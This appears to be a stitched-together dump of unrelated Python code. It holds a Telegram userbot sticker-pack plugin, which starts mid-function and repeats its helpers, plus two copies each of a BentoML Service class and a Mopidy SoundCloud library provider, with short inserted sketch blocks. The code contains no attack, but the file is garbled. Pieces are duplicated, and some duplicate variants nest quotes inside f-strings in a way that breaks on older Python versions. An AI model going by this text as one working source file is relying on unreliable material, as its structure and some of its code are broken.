event.edit("Downloading to my local completed") # https://gist.github.com/udf/e4e3dbb2e831c8b580d8fddd312714f7 directory_name = Config.TMP_DOWNLOAD_DIRECTORY + sticker_set.set.short_name zipf = zipfile.ZipFile(directory_name + ".zip", "w", zipfile.ZIP_DEFLATED) zipdir(directory_name, zipf) zipf.close() await borg.send_file( event.chat_id, directory_name + ".zip", caption=file_caption, force_document=True, allow_cache=False, reply_to=event.message.id, progress_callback=progress ) try: os.remove(directory_name + ".zip") os.remove(directory_name) except: pass await event.edit("task Completed") await asyncio.sleep(3) await event.delete() else: await event.edit("TODO: Not Implemented") # Helpers def is_it_animated_sticker(message): try: if message.media and message.media.document: mime_type = message.media.document.mime_type if "tgsticker" in mime_type: return True else: return False else: return False except: return False def is_message_image(message): if message.media: if isinstance(message.media, MessageMediaPhoto): return True if message.media.document: if message.media.document.mime_type.split("/")[0] == "image": return True return False return False async def silently_send_message(conv, text): await conv.send_message(text) response = await conv.get_response() await conv.mark_read(message=response) return response async def stickerset_exists(conv, setname): try: await borg(GetStickerSetRequest(InputStickerSetShortName(setname))) response = await silently_send_message(conv, "/addsticker") if response.text == "Invalid pack selected.": await silently_send_message(conv, "/cancel") return False await silently_send_message(conv, "/cancel") return True except StickersetInvalidError: return False def resize_image(image, save_locaton): """ Copyright Rhyse Simpson: https://github.com/skittles9823/SkittBot/blob/master/tg_bot/modules/stickers.py """ im = Image.open(image) maxsize = (512, 512) if (im.width and im.height) < 512: size1 = im.width size2 = im.height if im.width > im.height: scale = 512 / size1 size1new = 512 size2new = size2 * scale else: scale = 512 / size2 size1new = size1 * scale size2new = 512 
size1new = math.floor(size1new) size2new = math.floor(size2new) sizenew = (size1new, size2new) im = im.resize(sizenew) else: im.thumbnail(maxsize) im.save(save_locaton, "PNG") def progress(current, total): logger.info("Uploaded: {} of {}\nCompleted {}".format(current, total, (current / total) * 100)) def find_instance(items, class_or_tuple): for item in items: if isinstance(item, class_or_tuple): return item return None def zipdir(path, ziph): # ziph is zipfile handle for root, dirs, files in os.walk(path): for file in files: ziph.write(os.path.join(root, file)) os.remove(os.path.join(root, file))
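# --- Illustrative sketch (standalone, not part of the plugin above) ----------
# The getsticker handler inverts the mapping returned for a sticker set: the
# API gives <emoticon> -> [document ids], while pack.txt needs
# <document id> -> "all emoticons for that sticker". The pack data below is
# made up for demonstration.
from collections import defaultdict

packs = [("😎", [111, 222]), ("🔥", [222])]   # hypothetical (emoticon, documents) pairs
emojis = defaultdict(str)
for emoticon, documents in packs:
    for document_id in documents:
        emojis[document_id] += emoticon

assert emojis[111] == "😎" and emojis[222] == "😎🔥"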
"""Make / Download Telegram Sticker Packs without installing Third Party applications Available Commands: .kang [Optional Emoji] .packinfo .getsticker""" from telethon import events from io import BytesIO from PIL import Image import asyncio import datetime from collections import defaultdict import math import os import requests import zipfile from telethon.errors.rpcerrorlist import StickersetInvalidError from telethon.errors import MessageNotModifiedError from telethon.tl.functions.account import UpdateNotifySettingsRequest from telethon.tl.functions.messages import GetStickerSetRequest from telethon.tl.types import ( DocumentAttributeFilename, DocumentAttributeSticker, InputMediaUploadedDocument, InputPeerNotifySettings, InputStickerSetID, InputStickerSetShortName, MessageMediaPhoto ) from userbot.utils import admin_cmd from userbot import ALIVE_NAME DEFAULTUSER = str(ALIVE_NAME) if ALIVE_NAME else "Who is this" FILLED_UP_DADDY = "Invalid pack selected." @borg.on(admin_cmd(pattern="kang ?(.*)")) async def _(event): if event.fwd_from: return if not event.is_reply: await event.edit("Reply to a photo to add to my personal sticker pack.") return reply_message = await event.get_reply_message() sticker_emoji = "😎" input_str = event.pattern_match.group(1) if input_str: sticker_emoji = input_str user = await bot.get_me() if not user.username: user.username = user.id pack = 1 userid = event.from_id #packname = f"FRIDAY PACK" #packshortname = f"FRIDAY_{userid}_ns" # format: Uni_Borg_userid if userid == 1263617196: packname = f"@StarkGang Packs 🎭" packshortname = "StarkGangPack" else: packname = f"{user.username}'s {pack}" packshortname = f"FRIDAY_{userid}_Pack" await event.edit("`Wew ! I Love That Sticker ! Mind If i Kang It ?`") is_a_s = is_it_animated_sticker(reply_message) file_ext_ns_ion = "@FRIDAYOT.png" file = await borg.download_file(reply_message.media) uploaded_sticker = None if is_a_s: file_ext_ns_ion = "AnimatedSticker.tgs" uploaded_sticker = await borg.upload_file(file, file_name=file_ext_ns_ion) if userid == 813878981: packname = f"StarkGang Ka Pack" packshortname = "StarkGangisgreat" else: packname = f"{user.username}'s {pack}" packshortname = f"FRIDAY_{userid}" # format: Uni_Borg_userid elif not is_message_image(reply_message): await event.edit("Invalid message type") return else: with BytesIO(file) as mem_file, BytesIO() as sticker: resize_image(mem_file, sticker) sticker.seek(0) uploaded_sticker = await borg.upload_file(sticker, file_name=file_ext_ns_ion) await event.edit("Packing To Your Pack ! Please Wait!") async with borg.conversation("@Stickers") as bot_conv: now = datetime.datetime.now() dt = now + datetime.timedelta(minutes=1) if not await stickerset_exists(bot_conv, packshortname): await event.edit("`Creating a new pack!`") await silently_send_message(bot_conv, "/cancel") if is_a_s: response = await silently_send_message(bot_conv, "/newanimated") else: response = await silently_send_message(bot_conv, "/newpack") if "Yay!" not in response.text: await event.edit(f"**Error**! @Stickers replied: {response.text}") return response = await silently_send_message(bot_conv, packname) if not response.text.startswith("Alright!"): await event.edit(f"**Error**! @Stickers replied: {response.text}") return w = await bot_conv.send_file( file=uploaded_sticker, allow_cache=False, force_document=True ) response = await bot_conv.get_response() if "Sorry" in response.text: await event.edit(f"**Error**! 
@Stickers replied: {response.text}") return await silently_send_message(bot_conv, sticker_emoji) await silently_send_message(bot_conv, "/publish") response = await silently_send_message(bot_conv, f"<{packname}>") await silently_send_message(bot_conv, "/skip") response = await silently_send_message(bot_conv, packshortname) if response.text == "Sorry, this short name is already taken.": await event.edit(f"**Error**! @Stickers replied: {response.text}") return else: await silently_send_message(bot_conv, "/cancel") await silently_send_message(bot_conv, "/addsticker") await silently_send_message(bot_conv, packshortname) await bot_conv.send_file( file=uploaded_sticker, allow_cache=False, force_document=True ) response = await bot_conv.get_response() if response.text == FILLED_UP_DADDY: while response.text == FILLED_UP_DADDY: pack += 1 prevv = int(pack) - 1 packname = f"{user.username}'s {pack}" packshortname = f"Vol_{pack}_with_{user.username}" #if userid == 948408212: # packname = f"{user.username}'s {pack}" # packshortname = "Vol._{pack}_FRIDAY_ke_locker_me" # else: # packname = f"Vol._{pack}_FRIDAY{userid}" #packshortname = f"Vol._{pack}_Friday_{userid}_ns" if not await stickerset_exists(bot_conv, packshortname): await event.edit("**Pack No. **" + str(prevv) + "** full! Making a new Pack, Vol. **" + str(pack)) if is_a_s: response = await silently_send_message(bot_conv, "/newanimated") else: response = await silently_send_message(bot_conv, "/newpack") if "Yay!" not in response.text: await event.edit(f"**Error**! @Stickers replied: {response.text}") return response = await silently_send_message(bot_conv, packname) if not response.text.startswith("Alright!"): await event.edit(f"**Error**! @Stickers replied: {response.text}") return w = await bot_conv.send_file( file=uploaded_sticker, allow_cache=False, force_document=True ) response = await bot_conv.get_response() if "Sorry" in response.text: await event.edit(f"**Error**! @Stickers replied: {response.text}") return await silently_send_message(bot_conv, sticker_emoji) await silently_send_message(bot_conv, "/publish") response = await silently_send_message(bot_conv, f"<{packname}>") await silently_send_message(bot_conv, "/skip") response = await silently_send_message(bot_conv, packshortname) if response.text == "Sorry, this short name is already taken.": await event.edit(f"**Error**! @Stickers replied: {response.text}") return else: await event.edit("Pack No. " + str(prevv) + " full! Switching to Vol. " + str(pack)) await silently_send_message(bot_conv, "/addsticker") await silently_send_message(bot_conv, packshortname) await bot_conv.send_file( file=uploaded_sticker, allow_cache=False, force_document=True ) response = await bot_conv.get_response() if "Sorry" in response.text: await event.edit(f"**Error**! @Stickers replied: {response.text}") return await silently_send_message(bot_conv, sticker_emoji) await silently_send_message(bot_conv, "/done") else: if "Sorry" in response.text: await event.edit(f"**Error**! 
@Stickers replied: {response.text}") return await silently_send_message(bot_conv, response) await silently_send_message(bot_conv, sticker_emoji) await silently_send_message(bot_conv, "/done") await event.edit(f"**Sticker Has Been Kanged Successfully And Can Be Found** [Here](t.me/addstickers/{packshortname})") @borg.on(admin_cmd(pattern="packinfo")) async def _(event): if event.fwd_from: return if not event.is_reply: await event.edit("Reply to any sticker to get its pack info.") return rep_msg = await event.get_reply_message() if not rep_msg.document: await event.edit("Reply to any sticker to get its pack info.") return stickerset_attr_s = rep_msg.document.attributes stickerset_attr = find_instance(stickerset_attr_s, DocumentAttributeSticker) if not stickerset_attr.stickerset: await event.edit("Sticker does not belong to a pack.") return get_stickerset = await borg( GetStickerSetRequest( InputStickerSetID( id=stickerset_attr.stickerset.id, access_hash=stickerset_attr.stickerset.access_hash ) ) ) pack_emojis = [] for document_sticker in get_stickerset.packs: if document_sticker.emoticon not in pack_emojis: pack_emojis.append(document_sticker.emoticon) await event.edit(f"**Sticker Title:** `{get_stickerset.set.title}\n`" f"**Sticker Short Name:** `{get_stickerset.set.short_name}`\n" f"**Official:** `{get_stickerset.set.official}`\n" f"**Archived:** `{get_stickerset.set.archived}`\n" f"**Stickers In Pack:** `{len(get_stickerset.packs)}`\n" f"**Emojis In Pack:** {' '.join(pack_emojis)}") @borg.on(admin_cmd(pattern="getsticker ?(.*)")) async def _(event): if event.fwd_from: return input_str = event.pattern_match.group(1) if not os.path.isdir(Config.TMP_DOWNLOAD_DIRECTORY): os.makedirs(Config.TMP_DOWNLOAD_DIRECTORY) if event.reply_to_msg_id: reply_message = await event.get_reply_message() # https://gist.github.com/udf/e4e3dbb2e831c8b580d8fddd312714f7 if not reply_message.sticker: return sticker = reply_message.sticker sticker_attrib = find_instance(sticker.attributes, DocumentAttributeSticker) if not sticker_attrib.stickerset: await event.reply("This sticker is not part of a pack") return is_a_s = is_it_animated_sticker(reply_message) file_ext_ns_ion = "webp" file_caption = "https://t.me/RoseSupport/33801" if is_a_s: file_ext_ns_ion = "tgs" file_caption = "Forward the ZIP file to @AnimatedStickersRoBot to get Lottie JSON containing the vector information." 
sticker_set = await borg(GetStickerSetRequest(sticker_attrib.stickerset)) pack_file = os.path.join(Config.TMP_DOWNLOAD_DIRECTORY, sticker_set.set.short_name, "pack.txt") if os.path.isfile(pack_file): os.remove(pack_file) # Sticker emojis are retrieved as a mapping of # <emoji>: <list of document ids that have this emoji> # So we need to build a mapping of <document id>: <list of emoji> # Thanks, Durov emojis = defaultdict(str) for pack in sticker_set.packs: for document_id in pack.documents: emojis[document_id] += pack.emoticon async def download(sticker, emojis, path, file): await borg.download_media(sticker, file=os.path.join(path, file)) with open(pack_file, "a") as f: f.write(f"{{'image_file': '{file}','emojis':{emojis[sticker.id]}}},") pending_tasks = [ asyncio.ensure_future( download(document, emojis, Config.TMP_DOWNLOAD_DIRECTORY + sticker_set.set.short_name, f"{i:03d}.{file_ext_ns_ion}") ) for i, document in enumerate(sticker_set.documents) ] await event.edit(f"Downloading {sticker_set.set.count} sticker(s) to .{Config.TMP_DOWNLOAD_DIRECTORY}{sticker_set.set.short_name}...") num_tasks = len(pending_tasks) while 1: done, pending_tasks = await asyncio.wait(pending_tasks, timeout=2.5, return_when=asyncio.FIRST_COMPLETED) try: await event.edit( f"Downloaded {num_tasks - len(pending_tasks)}/{sticker_set.set.count}") except MessageNotModifiedError: pass if not pending_tasks: break await event.edit("Downloading to my local completed") # https://gist.github.com/udf/e4e3dbb2e831c8b580d8fddd312714f7 directory_name = Config.TMP_DOWNLOAD_DIRECTORY + sticker_set.set.short_name zipf = zipfile.ZipFile(directory_name + ".zip", "w", zipfile.ZIP_DEFLATED) zipdir(directory_name, zipf) zipf.close() await borg.send_file( event.chat_id, directory_name + ".zip", caption=file_caption, force_document=True, allow_cache=False, reply_to=event.message.id, progress_callback=progress ) try: os.remove(directory_name + ".zip") os.remove(directory_name) except: pass await event.edit("task Completed") await asyncio.sleep(3) await event.delete() else: await event.edit("TODO: Not Implemented") # Helpers def is_it_animated_sticker(message): try: if message.media and message.media.document: mime_type = message.media.document.mime_type if "tgsticker" in mime_type: return True else: return False else: return False except: return False def is_message_image(message): if message.media: if isinstance(message.media, MessageMediaPhoto): return True if message.media.document: if message.media.document.mime_type.split("/")[0] == "image": return True return False return False async def silently_send_message(conv, text): await conv.send_message(text) response = await conv.get_response() await conv.mark_read(message=response) return response async def stickerset_exists(conv, setname): try: await borg(GetStickerSetRequest(InputStickerSetShortName(setname))) response = await silently_send_message(conv, "/addsticker") if response.text == "Invalid pack selected.": await silently_send_message(conv, "/cancel") return False await silently_send_message(conv, "/cancel") return True except StickersetInvalidError: return False def resize_image(image, save_locaton): """ Copyright Rhyse Simpson: https://github.com/skittles9823/SkittBot/blob/master/tg_bot/modules/stickers.py """ im = Image.open(image) maxsize = (512, 512) if (im.width and im.height) < 512: size1 = im.width size2 = im.height if im.width > im.height: scale = 512 / size1 size1new = 512 size2new = size2 * scale else: scale = 512 / size2 size1new = size1 * scale size2new = 512 
size1new = math.floor(size1new) size2new = math.floor(size2new) sizenew = (size1new, size2new) im = im.resize(sizenew) else: im.thumbnail(maxsize) im.save(save_locaton, "PNG") def progress(current, total): logger.info("Uploaded: {} of {}\nCompleted {}".format(current, total, (current / total) * 100)) def find_instance(items, class_or_tuple): for item in items: if isinstance(item, class_or_tuple): return item return None def zipdir(path, ziph): # ziph is zipfile handle for root, dirs, files in os.walk(path): for file in files: ziph.write(os.path.join(root, file)) os.remove(os.path.join(root, file))
import sys import typing as t import logging from typing import TYPE_CHECKING from bentoml import Runner from bentoml import SimpleRunner from bentoml.io import IODescriptor from bentoml.exceptions import BentoMLException from ..types import Tag from ..bento.bento import get_default_bento_readme from .inference_api import InferenceAPI from ..utils.validation import validate_tag_str if TYPE_CHECKING: from .. import ext_typing as ext from ..bento import Bento WSGI_APP = t.Callable[ [t.Callable[..., t.Any], t.Mapping[str, t.Any]], t.Iterable[bytes] ] logger = logging.getLogger(__name__) class Service: """The service definition is the manifestation of the Service Oriented Architecture and the core building block in BentoML where users define the service runtime architecture and model serving logic. A BentoML service is defined via instantiate this Service class. When creating a Service instance, user must provide a Service name and list of runners that are required by this Service. The instance can then be used to define InferenceAPIs via the `api` decorator. """ apis: t.Dict[str, InferenceAPI] = {} # Name of the service, it is a required parameter for __init__ name: str # Tag/Bento/Version are only applicable if the service was load from a bento tag: t.Optional[Tag] = None bento: t.Optional["Bento"] = None version: t.Optional[str] = None # Working dir of the service, set when the service was load from a bento _working_dir: t.Optional[str] = None # Import path set by .loader.import_service method _import_str: t.Optional[str] = None # For docs property _doc: t.Optional[str] = None def __init__( self, name: str, runners: "t.Optional[t.List[t.Union[Runner, SimpleRunner]]]" = None, ): lower_name = name.lower() if name != lower_name: logger.warning(f"converting {name} to lowercase: {lower_name}") # Service name must be a valid dns1123 subdomain string validate_tag_str(lower_name) self.name = lower_name if runners is not None: self.runners = {} for r in runners: if r.name in self.runners: raise ValueError( f"Found duplicate name `{r.name}` in service runners." ) assert isinstance( r, (Runner, SimpleRunner) ), "Service runners list must only contain runner instances" self.runners[r.name] = r else: self.runners: t.Dict[str, "t.Union[Runner, SimpleRunner]"] = {} self.mount_apps: t.List[t.Tuple["ext.ASGIApp", str, str]] = [] self.middlewares: t.List[ t.Tuple[t.Type["ext.AsgiMiddleware"], t.Dict[str, t.Any]] ] = [] def on_asgi_app_startup(self) -> None: # TODO: initialize Local Runner instances or Runner Clients here # TODO(P1): add `@svc.on_startup` decorator for adding user-defined hook pass def on_asgi_app_shutdown(self) -> None: # TODO(P1): add `@svc.on_shutdown` decorator for adding user-defined hook pass def __del__(self): # working dir was added to sys.path in the .loader.import_service function if self._working_dir and sys.path: sys.path.remove(self._working_dir) def api( self, input: IODescriptor[t.Any], # pylint: disable=redefined-builtin output: IODescriptor[t.Any], name: t.Optional[str] = None, doc: t.Optional[str] = None, route: t.Optional[str] = None, ) -> t.Callable[[t.Callable[..., t.Any]], t.Callable[..., t.Any]]: """Decorator for adding InferenceAPI to this service""" D = t.TypeVar("D", bound=t.Callable[..., t.Any]) def decorator(func: D) -> D: from ..io_descriptors import Multipart if isinstance(output, Multipart): logger.warning( f"Found Multipart as the output of API `{name or func.__name__}`. 
" "Multipart response is rarely used in the real world," " less clients/browsers support it. " "Make sure you know what you are doing." ) self._add_inference_api(func, input, output, name, doc, route) return func return decorator def _add_inference_api( self, func: t.Callable[..., t.Any], input: IODescriptor[t.Any], # pylint: disable=redefined-builtin output: IODescriptor[t.Any], name: t.Optional[str], doc: t.Optional[str], route: t.Optional[str], ) -> None: api = InferenceAPI( name=name, user_defined_callback=func, input_descriptor=input, output_descriptor=output, doc=doc, route=route, ) if api.name in self.apis: raise BentoMLException( f"API {api.name} is already defined in Service {self.name}" ) self.apis[api.name] = api @property def asgi_app(self) -> "ext.ASGIApp": from ..server.service_app import ServiceAppFactory return ServiceAppFactory(self)() def mount_asgi_app( self, app: "ext.ASGIApp", path: str = "/", name: t.Optional[str] = None ) -> None: self.mount_apps.append((app, path, name)) # type: ignore def mount_wsgi_app( self, app: WSGI_APP, path: str = "/", name: t.Optional[str] = None ) -> None: from starlette.middleware.wsgi import WSGIMiddleware self.mount_apps.append((WSGIMiddleware(app), path, name)) # type: ignore def add_asgi_middleware( self, middleware_cls: t.Type["ext.AsgiMiddleware"], **options: t.Any ) -> None: self.middlewares.append((middleware_cls, options)) def openapi_doc(self): from .openapi import get_service_openapi_doc return get_service_openapi_doc(self) def __str__(self): if self.bento: return f'bentoml.Service(tag="{self.tag}", ' f'path="{self.bento.path}")' elif self._import_str and self._working_dir: return ( f'bentoml.Service(name="{self.name}", ' f'import_str="{self._import_str}", ' f'working_dir="{self._working_dir}")' ) else: return ( f'bentoml.Service(name="{self.name}", ' f'runners=[{','.join(self.runners.keys())}])' ) def __repr__(self): return self.__str__() @property def doc(self) -> str: if self.bento is not None: return self.bento.doc return get_default_bento_readme(self)
import sys import typing as t import logging from typing import TYPE_CHECKING from bentoml import Runner from bentoml import SimpleRunner from bentoml.io import IODescriptor from bentoml.exceptions import BentoMLException from ..types import Tag from ..bento.bento import get_default_bento_readme from .inference_api import InferenceAPI from ..utils.validation import validate_tag_str if TYPE_CHECKING: from .. import ext_typing as ext from ..bento import Bento WSGI_APP = t.Callable[ [t.Callable[..., t.Any], t.Mapping[str, t.Any]], t.Iterable[bytes] ] logger = logging.getLogger(__name__) class Service: """The service definition is the manifestation of the Service Oriented Architecture and the core building block in BentoML where users define the service runtime architecture and model serving logic. A BentoML service is defined via instantiate this Service class. When creating a Service instance, user must provide a Service name and list of runners that are required by this Service. The instance can then be used to define InferenceAPIs via the `api` decorator. """ apis: t.Dict[str, InferenceAPI] = {} # Name of the service, it is a required parameter for __init__ name: str # Tag/Bento/Version are only applicable if the service was load from a bento tag: t.Optional[Tag] = None bento: t.Optional["Bento"] = None version: t.Optional[str] = None # Working dir of the service, set when the service was load from a bento _working_dir: t.Optional[str] = None # Import path set by .loader.import_service method _import_str: t.Optional[str] = None # For docs property _doc: t.Optional[str] = None def __init__( self, name: str, runners: "t.Optional[t.List[t.Union[Runner, SimpleRunner]]]" = None, ): lower_name = name.lower() if name != lower_name: logger.warning(f"converting {name} to lowercase: {lower_name}") # Service name must be a valid dns1123 subdomain string validate_tag_str(lower_name) self.name = lower_name if runners is not None: self.runners = {} for r in runners: if r.name in self.runners: raise ValueError( f"Found duplicate name `{r.name}` in service runners." ) assert isinstance( r, (Runner, SimpleRunner) ), "Service runners list must only contain runner instances" self.runners[r.name] = r else: self.runners: t.Dict[str, "t.Union[Runner, SimpleRunner]"] = {} self.mount_apps: t.List[t.Tuple["ext.ASGIApp", str, str]] = [] self.middlewares: t.List[ t.Tuple[t.Type["ext.AsgiMiddleware"], t.Dict[str, t.Any]] ] = [] def on_asgi_app_startup(self) -> None: # TODO: initialize Local Runner instances or Runner Clients here # TODO(P1): add `@svc.on_startup` decorator for adding user-defined hook pass def on_asgi_app_shutdown(self) -> None: # TODO(P1): add `@svc.on_shutdown` decorator for adding user-defined hook pass def __del__(self): # working dir was added to sys.path in the .loader.import_service function if self._working_dir and sys.path: sys.path.remove(self._working_dir) def api( self, input: IODescriptor[t.Any], # pylint: disable=redefined-builtin output: IODescriptor[t.Any], name: t.Optional[str] = None, doc: t.Optional[str] = None, route: t.Optional[str] = None, ) -> t.Callable[[t.Callable[..., t.Any]], t.Callable[..., t.Any]]: """Decorator for adding InferenceAPI to this service""" D = t.TypeVar("D", bound=t.Callable[..., t.Any]) def decorator(func: D) -> D: from ..io_descriptors import Multipart if isinstance(output, Multipart): logger.warning( f"Found Multipart as the output of API `{name or func.__name__}`. 
" "Multipart response is rarely used in the real world," " less clients/browsers support it. " "Make sure you know what you are doing." ) self._add_inference_api(func, input, output, name, doc, route) return func return decorator def _add_inference_api( self, func: t.Callable[..., t.Any], input: IODescriptor[t.Any], # pylint: disable=redefined-builtin output: IODescriptor[t.Any], name: t.Optional[str], doc: t.Optional[str], route: t.Optional[str], ) -> None: api = InferenceAPI( name=name, user_defined_callback=func, input_descriptor=input, output_descriptor=output, doc=doc, route=route, ) if api.name in self.apis: raise BentoMLException( f"API {api.name} is already defined in Service {self.name}" ) self.apis[api.name] = api @property def asgi_app(self) -> "ext.ASGIApp": from ..server.service_app import ServiceAppFactory return ServiceAppFactory(self)() def mount_asgi_app( self, app: "ext.ASGIApp", path: str = "/", name: t.Optional[str] = None ) -> None: self.mount_apps.append((app, path, name)) # type: ignore def mount_wsgi_app( self, app: WSGI_APP, path: str = "/", name: t.Optional[str] = None ) -> None: from starlette.middleware.wsgi import WSGIMiddleware self.mount_apps.append((WSGIMiddleware(app), path, name)) # type: ignore def add_asgi_middleware( self, middleware_cls: t.Type["ext.AsgiMiddleware"], **options: t.Any ) -> None: self.middlewares.append((middleware_cls, options)) def openapi_doc(self): from .openapi import get_service_openapi_doc return get_service_openapi_doc(self) def __str__(self): if self.bento: return f'bentoml.Service(tag="{self.tag}", ' f'path="{self.bento.path}")' elif self._import_str and self._working_dir: return ( f'bentoml.Service(name="{self.name}", ' f'import_str="{self._import_str}", ' f'working_dir="{self._working_dir}")' ) else: return ( f'bentoml.Service(name="{self.name}", ' f'runners=[{",".join(self.runners.keys())}])' ) def __repr__(self): return self.__str__() @property def doc(self) -> str: if self.bento is not None: return self.bento.doc return get_default_bento_readme(self)
import collections import logging import re import urllib.parse from mopidy import backend, models from mopidy.models import SearchResult, Track logger = logging.getLogger(__name__) def generate_uri(path): return f"soundcloud:directory:{urllib.parse.quote("/".join(path))}" def new_folder(name, path): return models.Ref.directory(uri=generate_uri(path), name=name) def simplify_search_query(query): if isinstance(query, dict): r = [] for v in query.values(): if isinstance(v, list): r.extend(v) else: r.append(v) return " ".join(r) if isinstance(query, list): return " ".join(query) else: return query class SoundCloudLibraryProvider(backend.LibraryProvider): root_directory = models.Ref.directory( uri="soundcloud:directory", name="SoundCloud" ) def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.vfs = {"soundcloud:directory": {}} self.add_to_vfs(new_folder("Following", ["following"])) self.add_to_vfs(new_folder("Liked", ["liked"])) self.add_to_vfs(new_folder("Sets", ["sets"])) self.add_to_vfs(new_folder("Stream", ["stream"])) def add_to_vfs(self, _model): self.vfs["soundcloud:directory"][_model.uri] = _model def list_sets(self): sets_vfs = collections.OrderedDict() for (name, set_id, _tracks) in self.backend.remote.get_sets(): sets_list = new_folder(name, ["sets", set_id]) logger.debug(f"Adding set {sets_list.name} to VFS") sets_vfs[set_id] = sets_list return list(sets_vfs.values()) def list_liked(self): vfs_list = collections.OrderedDict() for track in self.backend.remote.get_likes(): logger.debug(f"Adding liked track {track.name} to VFS") vfs_list[track.name] = models.Ref.track( uri=track.uri, name=track.name ) return list(vfs_list.values()) def list_user_follows(self): sets_vfs = collections.OrderedDict() for (name, user_id) in self.backend.remote.get_followings(): sets_list = new_folder(name, ["following", user_id]) logger.debug(f"Adding set {sets_list.name} to VFS") sets_vfs[user_id] = sets_list return list(sets_vfs.values()) def tracklist_to_vfs(self, track_list): vfs_list = collections.OrderedDict() for temp_track in track_list: if not isinstance(temp_track, Track): temp_track = self.backend.remote.parse_track(temp_track) if hasattr(temp_track, "uri"): vfs_list[temp_track.name] = models.Ref.track( uri=temp_track.uri, name=temp_track.name ) return list(vfs_list.values()) def browse(self, uri): if not self.vfs.get(uri): (req_type, res_id) = re.match(r".*:(\w*)(?:/(\d*))?", uri).groups() # Sets if "sets" == req_type: if res_id: return self.tracklist_to_vfs( self.backend.remote.get_set(res_id) ) else: return self.list_sets() # Following if "following" == req_type: if res_id: return self.tracklist_to_vfs( self.backend.remote.get_tracks(res_id) ) else: return self.list_user_follows() # Liked if "liked" == req_type: return self.list_liked() # User stream if "stream" == req_type: return self.tracklist_to_vfs( self.backend.remote.get_user_stream() ) # root directory return list(self.vfs.get(uri, {}).values()) def search(self, query=None, uris=None, exact=False): # TODO Support exact search if not query: return if "uri" in query: search_query = "".join(query["uri"]) url = urllib.parse.urlparse(search_query) if "soundcloud.com" in url.netloc: logger.info(f"Resolving SoundCloud for: {search_query}") return SearchResult( uri="soundcloud:search", tracks=self.backend.remote.resolve_url(search_query), ) else: search_query = simplify_search_query(query) logger.info(f"Searching SoundCloud for: {search_query}") return SearchResult( uri="soundcloud:search", 
tracks=self.backend.remote.search(search_query), ) def lookup(self, uri): if "sc:" in uri: uri = uri.replace("sc:", "") return self.backend.remote.resolve_url(uri) try: track_id = self.backend.remote.parse_track_uri(uri) track = self.backend.remote.get_track(track_id) if track is None: logger.info( f"Failed to lookup {uri}: SoundCloud track not found" ) return [] return [track] except Exception as error: logger.error(f"Failed to lookup {uri}: {error}") return []
import collections import logging import re import urllib.parse from mopidy import backend, models from mopidy.models import SearchResult, Track logger = logging.getLogger(__name__) def generate_uri(path): return f"soundcloud:directory:{urllib.parse.quote('/'.join(path))}" def new_folder(name, path): return models.Ref.directory(uri=generate_uri(path), name=name) def simplify_search_query(query): if isinstance(query, dict): r = [] for v in query.values(): if isinstance(v, list): r.extend(v) else: r.append(v) return " ".join(r) if isinstance(query, list): return " ".join(query) else: return query class SoundCloudLibraryProvider(backend.LibraryProvider): root_directory = models.Ref.directory( uri="soundcloud:directory", name="SoundCloud" ) def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.vfs = {"soundcloud:directory": {}} self.add_to_vfs(new_folder("Following", ["following"])) self.add_to_vfs(new_folder("Liked", ["liked"])) self.add_to_vfs(new_folder("Sets", ["sets"])) self.add_to_vfs(new_folder("Stream", ["stream"])) def add_to_vfs(self, _model): self.vfs["soundcloud:directory"][_model.uri] = _model def list_sets(self): sets_vfs = collections.OrderedDict() for (name, set_id, _tracks) in self.backend.remote.get_sets(): sets_list = new_folder(name, ["sets", set_id]) logger.debug(f"Adding set {sets_list.name} to VFS") sets_vfs[set_id] = sets_list return list(sets_vfs.values()) def list_liked(self): vfs_list = collections.OrderedDict() for track in self.backend.remote.get_likes(): logger.debug(f"Adding liked track {track.name} to VFS") vfs_list[track.name] = models.Ref.track( uri=track.uri, name=track.name ) return list(vfs_list.values()) def list_user_follows(self): sets_vfs = collections.OrderedDict() for (name, user_id) in self.backend.remote.get_followings(): sets_list = new_folder(name, ["following", user_id]) logger.debug(f"Adding set {sets_list.name} to VFS") sets_vfs[user_id] = sets_list return list(sets_vfs.values()) def tracklist_to_vfs(self, track_list): vfs_list = collections.OrderedDict() for temp_track in track_list: if not isinstance(temp_track, Track): temp_track = self.backend.remote.parse_track(temp_track) if hasattr(temp_track, "uri"): vfs_list[temp_track.name] = models.Ref.track( uri=temp_track.uri, name=temp_track.name ) return list(vfs_list.values()) def browse(self, uri): if not self.vfs.get(uri): (req_type, res_id) = re.match(r".*:(\w*)(?:/(\d*))?", uri).groups() # Sets if "sets" == req_type: if res_id: return self.tracklist_to_vfs( self.backend.remote.get_set(res_id) ) else: return self.list_sets() # Following if "following" == req_type: if res_id: return self.tracklist_to_vfs( self.backend.remote.get_tracks(res_id) ) else: return self.list_user_follows() # Liked if "liked" == req_type: return self.list_liked() # User stream if "stream" == req_type: return self.tracklist_to_vfs( self.backend.remote.get_user_stream() ) # root directory return list(self.vfs.get(uri, {}).values()) def search(self, query=None, uris=None, exact=False): # TODO Support exact search if not query: return if "uri" in query: search_query = "".join(query["uri"]) url = urllib.parse.urlparse(search_query) if "soundcloud.com" in url.netloc: logger.info(f"Resolving SoundCloud for: {search_query}") return SearchResult( uri="soundcloud:search", tracks=self.backend.remote.resolve_url(search_query), ) else: search_query = simplify_search_query(query) logger.info(f"Searching SoundCloud for: {search_query}") return SearchResult( uri="soundcloud:search", 
tracks=self.backend.remote.search(search_query), ) def lookup(self, uri): if "sc:" in uri: uri = uri.replace("sc:", "") return self.backend.remote.resolve_url(uri) try: track_id = self.backend.remote.parse_track_uri(uri) track = self.backend.remote.get_track(track_id) if track is None: logger.info( f"Failed to lookup {uri}: SoundCloud track not found" ) return [] return [track] except Exception as error: logger.error(f"Failed to lookup {uri}: {error}") return []
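# --- Illustrative sketch (standalone) -----------------------------------------
# How generate_uri() and the regex in browse() above round-trip a directory
# path; the set id "1234" is a made-up example and make_uri() is a local copy
# of the same logic, not the provider's own function.
import re
import urllib.parse

def make_uri(path):
    return "soundcloud:directory:" + urllib.parse.quote("/".join(path))

uri = make_uri(["sets", "1234"])             # -> 'soundcloud:directory:sets/1234'
req_type, res_id = re.match(r".*:(\w*)(?:/(\d*))?", uri).groups()
assert (req_type, res_id) == ("sets", "1234")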
